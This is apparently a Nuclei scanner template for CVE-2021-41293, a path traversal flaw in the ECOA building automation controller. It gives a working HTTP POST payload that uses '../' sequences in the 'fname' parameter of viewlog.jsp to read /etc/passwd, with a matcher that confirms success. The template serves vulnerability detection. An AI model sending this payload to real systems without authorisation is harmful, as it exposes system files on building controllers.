id: CVE-2021-41293

info:
  name: ECOA Building Automation System - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41293
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
    - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-41293
    cwe-id: CWE-22
    epss-score: 0.0476
    epss-percentile: 0.91745
    cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ecoa
    product: ecs_router_controller-ecs_firmware
  tags: cve,cve2021,ecoa,lfi,disclosure

http:
  - raw:
      - |
        POST /viewlog.jsp HTTP/1.1
        Host: {{Hostname}}

        yr=2021&mh=6&fname=../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100ab68aafea1f091c94f6e96879fd60381c40bd92e03486c0195b4df48643677e2022002f015049c0bf0c7847c3d4c649706de65e75136d6957886bf152ec7e37d8a5c:922c64590222798bb761d5b6d8e72950